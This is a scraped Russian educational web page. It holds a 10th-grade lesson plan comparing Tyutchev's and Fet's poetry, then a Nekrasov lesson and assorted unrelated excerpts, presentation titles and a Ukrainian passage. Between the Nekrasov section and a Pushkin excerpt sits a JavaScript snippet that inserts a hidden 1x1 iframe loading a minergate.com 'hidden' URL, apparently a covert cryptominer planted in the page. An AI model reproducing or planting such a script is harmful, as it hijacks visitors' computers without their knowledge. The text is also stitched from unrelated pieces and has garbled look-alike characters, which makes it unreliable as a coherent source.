ТЕМА: СРАВНИТЕЛЬНО-СОПОСТАВИТЕЛЬНЫЙ АНАЛИЗ
ЛИРИКИ Ф.ТЮТЧЕВА И А.ФЕТА
ПРЕДМЕТ: ЛИТЕРАТУРА КЛАСС: 10
ЦЕЛИ: развивать умения учащихся сопоставлять разные художественные
произведения с точки зрения содержания и формы, находить в тексте
Ключевые слова, умение обосновывать свою точку зрения; развивать
Эстетическую культуру учащихся; воспитывать уважительное
Отношение к различным точкам зрения на анализируемые проблемы.
ТИП УРОКА: комбинированный
ОБОРУДОВАНИЕ: презентация, карточки с текстами стихотворений и
вопросами к ним
ХОД УРОКА
Вечная красота природы и бесконечная сила любви –
и составляют главное содержание чистой лирики.
В.С. Соловьёв
1. ОРГМОМЕНТ
2. СЛОВО УЧИТЕЛЯ
Позади уроки, посвящённые творчеству Тютчева и Фета в отдельности. Теперь вы знаете, что в творчестве обоих поэтов есть точки соприкосновения – это темы стихотворений. Сегодня на уроке путём сопоставления и сравнения мы попытаемся выяснить, в чём сходства и различия точек зрения поэтов на ту или иную тему.
Сначала вы будете работать в группах, отвечая на вопросы. Затем каждая группа представит итог своей работы.
3. РАБОТА В ГРУППАХ
1-ая группа анализирует стихотворения любовной темы.
2-ая группа – тема Родины.
3-я группа – тема поэта и поэзии.
4. ВЫСТУПЛЕНИЯ ГРУПП
1) Выразительное чтение стихотворений. Презентация.
2) Ответы на вопросы
5. ОБОЩАЮЩЕЕ СЛОВО УЧИТЕЛЯ
Итак, подводя итог всему сказанному, сделаем следующие выводы:
А) любовь не обошла стороной ни Фета, ни Тютчева. Оба были счастливы, оба страдали. Для Тютчева характерно изображение любви как трагического чувства. Стихи Фета о любви наоборот наполнены радостью, счастьем (кроме стихотворений, посвящённых Марии Лазич).
Б) Оба поэта сходятся в своём отношении к Родине. Для обоих образ Родины неразрывно связан с образом русской патриархальной деревни, только у Тютчева это крестьянская деревня, а у Фета – помещичья. Однако любовь к России омрачнена необразованностью народа, его смиренностью и долготерпением.
В) И для Тютчева, и для Фета поэзия – это божественный дар, божественная сила, дарованная избранным. А задача поэзии не в том, чтобы решать политические и социальные проблемы времени, а в том, чтобы воспевать прекрасное: природу, любовь, жизнь. Лирика Тютчева и Фета – поэзия чистого искусства.
Есть ещё одна общая тема в творчестве поэтов – это тема природы. Безусловно, и Фет, и Тютчев являются непревзойдёнными мастерами пейзажной лирики.
Но есть и отличительные черты поэтики. Поэзия Фета импрессионистическая: предметы, явления, чувства он изображает обрывками, штрихами, мазками слов, фраз. Тютчеву же свойственна философичность, нежели изобразительность.
6. ПОДВЕДЕНИЕ ИТОГОВ, ВЫСТАВЛЕНИЕ ОЦЕНОК
7. ДОМАШНЕЕ ЗАДАНИЕ
Выучить любое стихотворение Тютчева или Фета (не менее 20 строк)
ТЕМА ПОЭТА И ПОЭЗИИ
Ф. ТЮТЧЕВ А. ФЕТ
« SILENTIUM » * * *
Молчи, скрывайся и таи Как беден наш язык? – Хочу и не могу. -
И чувства и мечты свои – Не передать того ни другу, ни врагу,
Пускай в душевной глубине Что буйствует в груди прозрачною волною,
Встают и заходят оне Напрасно вечное томление сердец,
Безмолвно, как звёзды в ночи, - И клонит голову маститую мудрец
Любуйся ими - и молчи.Пред этой ложью роковой.
Как сердцу высказать себя? Лишь у тебя, поэт, крылатый слова звук
Другому как понять тебя? Хватает на лету и закрепляет вдруг
Поймёт ли он, чем ты живёшь? И тёмный бред души, и трав неясный запах;
Мысль изречённая есть ложь; Так, для безбрежного покинув скудный дол,
Взрывая, возмутишь ключи, - Летит за облака Юпитера орёл,
Питайся ими – и молчи. Сноп молнии неся мгновенный в верных лапах.
Лишь жить в себе самом умей – 1887 г.
Есть целый мир в душе твоей
Таинственно-волшебных дум;
Их оглушит наружный шум,
Дневные разгонят лучи, -
Внимай их пенью – и молчи!..
1830 г.
ВОПРОСЫ
1) Выделите ключевое слово, на котором строится 1) На какие части можно разделить это стихотворение? всё стихотворение?
Какова основная мысль первой части?
2) Почему поэт призывает молчать, молча любоваться 2) В чём видит автор задачу поэта и
своими чувствами и мечтами? сущность поэзии?
3) Найдите созвучные строчки в этих стихотворениях. Какая мысль роднит эти два произведения?
ТЕМА ЛЮБВИ
Ф. ТЮТЧЕВ А. ФЕТ
«ПРЕДОПРЕДЕЛЕНИЕ» * * *
Любовь, любовь – гласит преданье – Шёпот, робкое дыханье,
Союз души с душой родной – Трели соловья,
Их съединенье, сочетанье, Серебро и колыханье
И роковое их слиянье, Сонного ручья,
И… поединок роковой…
Свет ночной, ночные тени,
И чем одно из них нежнее Тени без конца,
В борьбе неравной двух сердец, Ряд волшебных изменений
Тем неизбежней и вернее, Милого лица,
Любя, страдая, грустно млея,
Оно изноет, наконец… В дымных тучках пурпур розы,
1851 г. Отблеск янтаря,
И лобзания, и слёзы,
И заря, заря!...
1850 г.
ВОПРОСЫ
что такое любовь? понимаем, что именно об этом чувстве идёт
сильнее? их чувства и настроения.
ТЕМА РОДИНЫ
Ф. ТЮТЧЕВ А. ФЕТ
* * * «ДЕРЕВНЯ»
Эти бедные селенья, Люблю я приют ваш печальный,
Эта скудная природа - И вечер деревни глухой,
Край родной долготерпенья, И за лесом благовест дальний,
Край ты русского народа! И кровлю, и крест золотой.
Не поймёт и не заметит Люблю я немятого луга
Гордый взор иноплеменный, К окну подползающий пар,
Что сквозит и тайно светит И тесного, тихого круга
В наготе твоей смиренной. Не раз долитой самовар.
Удручённый ношей крестной, Люблю я на тех посиделках
Всю тебя, земля родная, Старушки чепец и очки;
В рабском виде царь небесный Люблю на окне на тарелках
Исходил, благословляя. Овса золотые злачки;
1855 г.
На столике близко к окошку
Корзину с узорным чулком,
И по полу резвую кошку
В прыжках за проворным клубком;
И милой застенчивой внучки
Красивый девичий наряд,
Движение бледненькой ручки
И робко опущенный взгляд;
Прощанье смолкающих пташек
И месяца бледный восход,
Дрожанье фарфоровых чашек
И речи замедленный ход;
И собственной выдумки сказки,
Прохлады вечерней струю
И вас, любопытные глазки,
Живую награду мою!
1842 г.
ВОПРОСЫ
1) Выделите ключевые слова. Какова общая тональность стихотворений?
2) Как вы думаете, «что сквозит и тайно светит в наготе твоей смиренной»?
3) Какой образ Родины предстаёт перед читателями в стихотворении Тютчева? Фета?
4) Что общего? В чём различие?
В результате изучения темы у учащихся должно ᴄᴫᴏжиться четкое представление об особенностях поэтического стиля Ф. Тютчева и А. Фета
В начале урока учитель вместе с классом составляет обобщающую таблицу, которая записывается в тетрадях.
Особенности поэтического стиля Тютчева и Фета
Тютчев Фет |
|
Философский характер поэзии, мысль в которой всегда сливается с образом В поэзии Тютчев стремится осмыслить жизнь Вселенной, постичь тайны космоса и человеческого бытия |
Трагический характер лирики, доминирующее чувство - напряжение, вместе с тем присущий поэзии Фета свет и оптимизм. Диалектика трагедии и радости, преодоление драматических ситуаций чувством гармонии мира |
Жизнь, по Тютчеву, - это противоборство враждебных сил. Драматизм восприятия действительности в сочетании с неиссякаемой любовью к жизни | Красота в его стихах - это преодоленное страдание, радость, добытая из боли. Жизнь в стихах Фета - миг, закрепленный в вечности |
Человеческое «я» по отношению к природе - не капля в океане, а две равные беспредельности. Внутренние, незримые движения человеческой души созвучны зримой диалектике явлений природы | Импрессиоʜᴎϲтский характер изображения чувств, их фрагментарность и предельная образность. Строгая художественная структура стихов, их внутреннее равновесие и ощущение эскизности, нарочитой оборванности |
Образная система лирики Тютчева сочетает предметные реалии внешнего мира и субъективные впечатления от этого мира, производимые на лирика. Мастерство в изображении гармонии предметных реалий мира внешнего и глубины мира внутреннего | Повышенная метафоричность поэзии, динамичность и музыкальность художественных образов. Преобладание настроения над мыслью, мысль «растворена» в музыке |
Мастерство лирика в создании фонетических И живописных образов, сочетание звукописи С неожиданной палитрой красок, цветных образов | Мастерство в использовании параллелизмов, повторов, периодов, ритмических пауз, богатство и глубина поэтических интонаций, звуковой инструменᴛᴏʙки |
Во второй половине урока можно организовать самостоятельную исследовательскую работу по сопоставительному анализу стихотворения Ф. Тютчева «Еще земли печален вид…» и стихотворения А. Фета «Еще весны душистой нега…» и подгоᴛᴏʙку к самостоятельной письменной работе, которую можно начать в классе, а завершить дома.
Задания для сопоставительного анализа Выявите особенности художественной формы каждого стихотворения. Какой поэтический смысл можно при этом заметить?
О чем эти стихотворения? Есть ли в них аллегорический подтекст?
Какие образы стихотворений можно считать образами-символами? Сопоставьте лексику, синтаксис, поэтические интонации стихотворений. Сделайте выводы о сходстве и различии чувств и художественных образов этих стихотворений. Сделайте выводы об основных особенностях поэтического стиля Тютчева и Фета, проявившихся в этих стихотворениях.
«Мне борьба мешала быть поэтом, песни мне мешали быть борцом». Личность и судьба Н. А. Некрасова
Николай Алексеевич Некрасов В словах Некрасова, которые можно взять эпиграфом к творчеству лирика, - причина внутренних противоречий в его мировоззрении и творчестве. Поэт - лирик по сути - всю жизнь подчинял свое поэтическое творчество политическим и общественным задачам. Он не ждал для своих «песен» божественных звуков, ʜᴎϲпосланных свыше, а стремился учить свою музу, какой она должна быть.
По мнению Некрасова, муза обязана «дикᴛᴏʙать» поэту строки, исполненные сострадания к угнетенному и обездоленному народу, быть музой «мести и печали»
В начале урока - небольшой концерт из стихотворений Некрасова, а кроме того эмоциональный рассказ о наиболее важных страницах жизни и творчества лирика. Можно прочитать в классе стихи, показывающие глубокие чувства сострадания к русскому народу, стихи о любви, о задачах поэтического творчества, к примеру: «Надрывается сердце от муки…», «Ты всегда хороша несравненно… », «Внимая ужасам войны…», «Праздник жизни - молодости годы…
», «Поэту» («Любовь и Труд - под грудами развалин…»), «Русскому писателю».
Вопросы классу на выявление восприятия Какие жизненные проблемы волновали лирика? Каким вам представляется его облик в этих стихах? Основой рассказа учителя о страницах биографии писателя может стать хронологическая схема: 1.
Детство в селе Грешневе на Волге, учеба в ярославской гимназии. 2. Первые годы жизни в Петербурге, конфликт с отцом, начало поэтической деятельности. Отрицательная оценка в критике сборника «Мечты и звуки».
3. Переломный момент в жизни Некрасова - сближение с Белинским. Некрасов - апологет «гоголевского направления» в литературе. Текст с сайта Биг Реферат РУ
«Физиология Петербурга». 4. Произведения первой половины 40-х годов: «Родина», «Современная ода», «Колыбельная песня», «В дороге» и др. Горечь и сострадание униженным, ирония в адрес «хозяев жизни».
Вопросы и задания для обсуждения стихотворения «Еду ли ночью по улице темной…» 1. Каким настроением проникнуто это стихотворение? Как бы вы определили его жанр (воспоминание, размышление, элегия, реквием, жанровая сцена)?
В чем истоки трагедии людей? Докажите, что доля женщины была особенно тяжела и беспросветна. Какой единственный выход находит героиня из нищеты и горя? 3. За что упрекает себя лирический субъект стихотворения? Почему он не может забыть матери своего ребенка? 4. Как случай из «частной жизни» помогает понять драматизм мира, в котором живут люди? Какие предметные реалии характеризуют мир, где живут герои? Почему мир беспощаден к ним? 5. Найдите ключевые слова в каждой части стихотворения. Как они связаны с поздним прозрением лирического субъекта? Как он оценивает свою «неудачную» любовь? Индивидуальные задания. Сопоставьте стихотворения «Еду ли ночью по улице темной…» и «В дороге». Есть ли в них основания для сопоставления?
Сопоставьте разные точки зрения на стихотворение «Еду ли ночью по улице темной…»: «Скажите от меня Некрасову, что его стихотворение в 9-й книжке [«Современника»] меня совершенно с ума свело; денно и нощно твержу я это удивительное произведение - и уже наизусть выучил» (из письма И. Тургенева В. Белинскому от 26 ноября 1847 года). «Кто способен написать стихотворения: „Филантроп“, „Эпилог к ненаписанной поэме“, „Еду ли ночью по улице темной… “, „Саша“, „Живя согласно с строгою моралью…
“, - тот может быть уверен в том, что его знает и любит живая Россия» (Д. Писарев, 1861). «Нельзя без содрогания и отвращения читать этой ужасной повести! В ней так много безнравственного, так много ужасающей нищеты!..
И нет ни одной отрадной мысли!.. Нет и тени того упования на благость провидения, которое всегда, постоянно подкрепляет злополучного нищего и удерживает его от преступления… Жаль, что муза г. Некрасова одна из самых мрачных и что он видит все в черном свете…
Как будто уже нет более светлой стороны?» (из рапорта цензора Е. Волкова, чиновника особых поручений при миʜᴎϲтре народного просвещения, инспектору А.
В 1847-1866 годах.
Некрасов - издатель и редактор «Современника». Основные темы и мотивы лирики Некрасова 1847-1866 годов. Важно учесть, что их жанровое многообразие: Стихи о тяжелой судьбе крестьян, городской бедноты, женской доле («Орина, мать солдатская», «В полном разгаре страда деревенская…», «О погоде», «Плач детей», «Забытая деревня» и др.); Лирические стихи о любви, о ᴄᴫᴏжных взаимоотношениях любящих людей («Ты всегда хороша несравненно…», «Мы с тобой - бестолковые люди…», «Я не люблю иронии твоей…
», «Прости» и др.); Стихи о поэзии, о ᴄᴫᴏжном противоречии между поэтическим призванием и общественным долгом («Праздник жизни - молодости годы…», «Безвестен я. Я с вами не стяжал…», «Блажен незлобивый поэт…
», «Поэт и гражданин» и др.); Стихи, посвященные ᴛᴏʙарищам по борьбе, революционным настроениям («Песня Еремушке», «На смерть Шевченко», «Тургеневу», «Белинский», «Размышления у парадного подъезда», «Памяти Добролюбова» и др.); Стихи о России, о высоком общественном назначении русского человека («Что ни год - уменьшаются силы…», «Саша», «Несчастные», «Возвращение», «Начало поэмы» и др.). 6
В 1867-1877 годах.
Некрасов - редактор и издатель журнала «Отечественные записки». Вершины поэтического творчества Некрасова в ϶ᴛόᴛпериод: Поэмы о декабристах («Дедушка», «Русские женщины»), сатирические поэмы («Недавнее время», «Современники»), поэма «Кому на Руси жить хорошо»; Элегические произведения («Душно без счастья и воли…», «Три элегии», «Уныние», «Утро», «Элегия»); Лирический цикл «Последние песни» (1876-1877) («Сеятелям», «Скоро стану добычею тленья…», «Зине», «О Муза!
я у двери гроба!.. »). 7. 8 января 1878 года - смерть Некрасова. Его поэтическое завещание - стихотворение «Зине». Зина - жена Некрасова.
Страницы: 1 2
Ее настоящее имя Фекла Оʜᴎϲимовна Викторова. Когда Некрасов познакомился с ней в 1871 году, ему было 50 лет, ей 18. Она была женщиной без образования. Когда он заболел, она так самоотверженно ухаживала за ним, что преждевременно состарилась. Информация с сайта Бигреферат.. Текст с сайта Биг Реферат РУ После его смерти она уехала из Петербурга и умерла в Сараᴛᴏʙе в 1915 году.
Вопросы и задания к стихотворению «Зине» С каким чувством поэт идет к смерти?
Какой жизненный итог подводит? Как и с каким настроением он рассуждает о своей посмертной славе? Почему он считает, что его слава «померкнет» после его смерти? Что для лирика представляет большую ценность в жизни: песни или борьба? Какой характер приобретает противоречие между поэтическим талантом и необходимостью участия в общественной борьбе?
За что упрекает себя поэт? Каков его нерукотворный памятник себе? Сопоставьте ᴇᴦᴏ позицию с поэтическими убеждениями Пушкина в стихотворении «Памятник».
Как проявляются в этом стихотворении гумаʜᴎϲтические взгляды Некрасова? Каким, по Некрасову, должно быть высокое предназначение человека?
Выводы. Сложная, полная неожиданностей и сомнений жизнь Некрасова отразилась в его произведениях. Он живо откликался на многие злободневные события своего времени; сочувствовал страдающим и обездоленным; учил свою музу, какой она должна быть; противопоставлял служение искусству борьбе за счастье угнетенных; восхищался своими соотечественниками, придерживающимися революционных позиций; тонко чувствовал интимные отношения между людьми, их ᴄᴫᴏжность и драматизм. Незадолго до смерти он приходит к убеждению, что он плохой поэт, учитывая, что подчинил свой поэтический талант политической борьбе, и плохой борец, учитывая, что сердце лирика, открытое «песням», не способно к последовательной и ожесточенной борьбе с врагами.
Страницы: 1 2
Страница 1 из 1
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body"); s.appendChild(w, s); })(); ...
В исключительно богатом и разнообразном творчестве Пушкина стихотворения занимают очень большое и значительное место. Еще на школьной скамье, в лицее, Пушкин задумывает ряд крупных литературных произведений: поэму, комедию, роман, - но все эти замыслы не получают осуществления и остаются не законченными на той или иной стадии работы. Зато Пушкин-лицеист пишет очень много стихотворений....
В процессе внутришкольного контроля важную роль играет посещение уроков руководителями образовательного учреждения. Посещение уроков планируется на неделю, исходя из общих задач, намеченных в годовом плане работы школы. В плане посещения отмечаются классы, предметы, содержание и цель посещения. Цель посещения может быть общей, направленной на повышение эффективности учебного процесса всей школы, а также частной, например, изучение системы работы отдельного учителя и способов решения им конкретных педагогических задач на уроках (к примеру, закрепление изученного материала). Уроки молодых учителей руководители посещают с целью ознакомления с их стилем и системой работы, оказания им методической помощи. Уроки опытных учителей управленцы посещают, как правило, для того, чтобы обобщить их богатый педагогический опыт....
С детских лет с нами стихи Федора Ивановича Тютчева. Я еще не умела читать, но уже знала наизусть: Люблю грозу в начале мая, Когда весенний, первый гром, Как бы резвяся и играя, Грохочет в небе голубом. В России все - от мала до велика - знают это стихотворение. Строки стихотворения «Весенняя гроза», его образы и его звучание слились для меня с образом и звучанием весенней грозы, стали ее выражением. Оно давно стало наиболее емким и поэтически точным выражением грозы над полем, лесом, садом, над зелеными просторами зачинающейся весны в России. Стихотворение «Весенняя гроза» по праву называют классическим. Оно выдержало труднейшее испытание временем и осталось живым произведением русской поэзии....
Федір Іванович Тютчев коштує особняком у російському поетичному пантеоні. Він - сучасник Пушкіна. Але це ніяк не читається. Його поезія позбавлена тимчасових прикмет. Її стрижнем є не почуттєва емоція враження, а єдина світоглядна концепція. Поетика Тютчева осягає початки й підстави буття. У ній простежуються дві лінії. Перша прямо пов"язана з біблійним міфом про створення миру, друга, через романтичну поезію, сходить до античних подань про світ і космос. Античне вчення про походження світу цитується Тютчевим постійно. Вода - от основа буття, вона головний елемент життя: Ще в полях біліє сніг, А води вуж навесні шумлять - Біжать і будять сонний брег, Біжать, і блищать, і говорять......
Два величайших поэта своей эпохи - Федор Иванович Тютчев и Афанасий Афанасьевич Фет. Вклад этих писателей в систему русского стихосложения неоценим. В творчестве их обоих можно встретить черты, присущие многим литературным деятелям того времени. Возможно, именно поэтому этих двух поэтов так часто сравнивают. Между тем, и у Тютчева, и у Фета есть особые, неповторимые детали и настроения, которые не встретишь в творчестве другого.
Среди сходств творчества двух поэтов можно отметить то, как описывается внутренний мир лирических героев. И Тютчев, и Фет, уделяют большее внимание глубочайшим душевным переживаниям человека, портреты их лирических героев очень психологичны. Кроме психологизма оба поэта используют прием параллелизма: внутренний мир, настроение человека, его глубокие переживания и чувства часто находят отражение в природе.
Описания самой природы у поэтов так же схожи. У них природа двупланова: у нее есть пейзажная и психологическая сторона. Этим как раз и объясняется применение параллелизма: описание внешнего мира как бы переходит в описание эмоций лирического героя. Еще одно сходство – мотивы любовной лирики. Тютчев и Фет пережили жуткую трагедию: потеряли любимого человека, и эта потеря отразилась в характере их любовной лирики.
Несмотря на такое большое количество описанных выше сходных черт лирики Фета и Тютчева, в их творчестве достаточно много различий. Лирика Фета тяготеет более к описательной пейзажной тематике, в то время как стихотворения Тютчева обладают философским характером (хотя и у него достаточно пейзажных стихотворений). Отношение к жизни в стихотворениях поэтов так же разнится: Фет восторгается жизнью, а Тютчев воспринимает ее как бытие.
Поэты по-разному воспринимают природу и человека: для Тютчева природа – это огромный мир, перед лицом которого человек становится бессильным, а Фет воспринимает ее как живое существо, живущее в абсолютной гармонии с человеком. Различна и «техническая» сторона стихотворений. Фет в большом количестве использует синтаксические средства выразительности, особенно часто у него встречается композиционный повтор. Тютчев же чаще применяет иносказательные тропы, в особенности метафору и ее разновидности.
Итак, несмотря на большое количество найденных сходств, нельзя упускать из виду и огромный пласт различий между лирикой Фета и Тютчева. Поэты жили в одной эпохе, на них влияло одно общество и даже некоторые факты биографии у них сходны, поэтому не стоит удивляться, что в их творчестве есть некоторые сходные мотивы. Но при этом Фет и Тютчев являются самостоятельными творческими личностями, способными творить нечто самобытное и уникальное, вкладывая в это частичку своей души.
«Афанасий Фет» - Гончаров. Со временем владения Фета расширились - он приобрел еще два поместья. Девушка сгорела от попавшей на платье непотушенной спички. В хозяйстве рачительного барина была собственная мельница и конный завод. Афанасий Фет. Супруги поселились в Москве. С 1883г. Если радует утро тебя, Русский поэт-лирик, переводчик, мемуарист.
«Уроки по творчеству Фета» - В зале стоял рояль. - Какие чувства и мысли вызывает у Вас творчество А.Фета? Рефлексия. "Волшебство звуков в творчестве А.А.Фета". Что является темой стихотворения? Афанасий Афанасьевич подошел ко мне и попросил повторить... Сколько времени проходит в стихотворении? Какие впечатления у Вас остались после урока?
«Фет о любви» - Здесь Фет, большой ценитель прекрасных дам, познакомился и подружился с сёстрами Лазич – Еленой и Марией. В знаменитых фетовских «Вечерних огнях» есть пронзительные строки о Марии, что, умирая, думала о своём любимом: «И хоть жизнь без тебя суждено мне влачить, но мы вместе с тобой, нас нельзя разлучить…».
«Поэт Фет» - Так плещет на багряном маке Крылом лазурный мотылек. Смерть Фета тоже была странной. Лирические откровения Фета, посвящённые Марии, лучшие в творчестве поэта. Мария Петровна Боткова. «Современнике». Лазич трагически погибла при загадочных обстоятельствах. Вскоре Фету пришлось по служебной надобности на время уехать.
«Фет» - 1820 - 1892. Мария Петровна была некрасива и ей уже исполнилось 28 лет. М. П. Погодин. Но венчание Фета и Марии Боткиной состоялось. Биография. Военная служба. «Современник». Сборники «Вечерние огни» и переводы. Покупка имения. Новоявленные супруги поселились в Москве. О литературе… Там он познакомился с дочерью богатого московского чаеторговца Марией Петровной Боткиной.
«Фет биография» - Олицетворение? Что такое стих? Сравнение? Брейн-ринг. В чем смысл сопоставления коршуна и человека? Какие вы знаете размеры стиха? Афанасий Афанасьевич Фет. Метафора? Тема: Поэт- пейзажист А. А. Фет. Родители А.А.Фета. Страницы биографии. «Ель рукавом мне тропинку завесила…». Стихотворение Ф. И. Тютчева «Листья».